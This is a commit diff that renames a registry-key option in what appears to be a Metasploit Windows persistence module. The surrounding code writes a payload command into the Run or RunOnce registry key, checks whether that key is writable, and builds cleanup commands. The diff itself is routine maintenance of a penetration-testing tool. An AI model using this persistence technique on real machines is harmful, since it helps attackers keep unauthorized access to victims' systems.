registry persistence peer review

Author: h00die

documentation/modules/exploit/windows/persistence/registry.md

@@ -36,7 +36,7 @@ The name to use for the `Run` key. Default: random
 
 Amount of time to sleep (in seconds) before executing payload. Default: 0
 
-### RegKey
+### REG_KEY
 
 Registry Key To Install To. Options are `Run` and `RunOnce`. Defaults to `Run`
 

modules/exploits/windows/persistence/registry.rb

@@ -62,7 +62,7 @@ def initialize(info = {})
                     [false, 'The name to use for the \'Run\' key. (Default: random)' ]),
       OptInt.new('SLEEP_TIME',
                  [false, 'Amount of time to sleep (in seconds) before executing payload. (Default: 0)', 0]),
-      OptEnum.new('RegKey', [true, 'Registry Key To Install To', 'Run', %w[Run RunOnce]]),
+      OptEnum.new('REG_KEY', [true, 'Registry Key To Install To', 'Run', %w[Run RunOnce]]),
     ])
   end
 
@@ -106,15 +106,15 @@ def install_blob(root_path, blob, blob_reg_key, blob_reg_name)
     return new_key
   end
 
-  def runkey
-    datastore['RegKey']
+  def regkey
+    datastore['REG_KEY']
   end
 
   def install_cmd(cmd, cmd_reg, root_path)
-    unless registry_setvaldata("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}", cmd_reg, cmd, 'REG_EXPAND_SZ')
+    unless registry_setvaldata("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}", cmd_reg, cmd, 'REG_EXPAND_SZ')
       fail_with(Failure::Unknown, 'Could not install run key')
     end
-    print_good("Installed run key #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}\\#{cmd_reg}")
+    print_good("Installed run key #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}\\#{cmd_reg}")
   end
 
   def get_root_path
@@ -128,7 +128,7 @@ def create_cleanup(root_path, blob_reg_key, blob_reg_name, cmd_reg, new_key)
     if new_key
       @clean_up_rc << "reg deletekey -k '#{root_path}\\#{blob_reg_key}'\n"
     end
-    @clean_up_rc << "reg deleteval -k '#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}' -v '#{cmd_reg}'\n"
+    @clean_up_rc << "reg deleteval -k '#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}' -v '#{cmd_reg}'\n"
   end
 
   def check
@@ -140,10 +140,10 @@ def check
     root_path = get_root_path
     rand = Rex::Text.rand_text_alphanumeric(15)
 
-    vprint_status("Checking registry write access to: #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}\\#{rand}")
-    return Msf::Exploit::CheckCode::Safe("Unable to write to registry path #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}") if registry_createkey("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{rand}").nil?
+    vprint_status("Checking registry write access to: #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}\\#{rand}")
+    return Msf::Exploit::CheckCode::Safe("Unable to write to registry path #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}") if registry_createkey("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{rand}").nil?
 
-    registry_deletekey("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{runkey}\\#{rand}")
+    registry_deletekey("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}\\#{rand}")
 
     Msf::Exploit::CheckCode::Vulnerable('Registry writable')
   end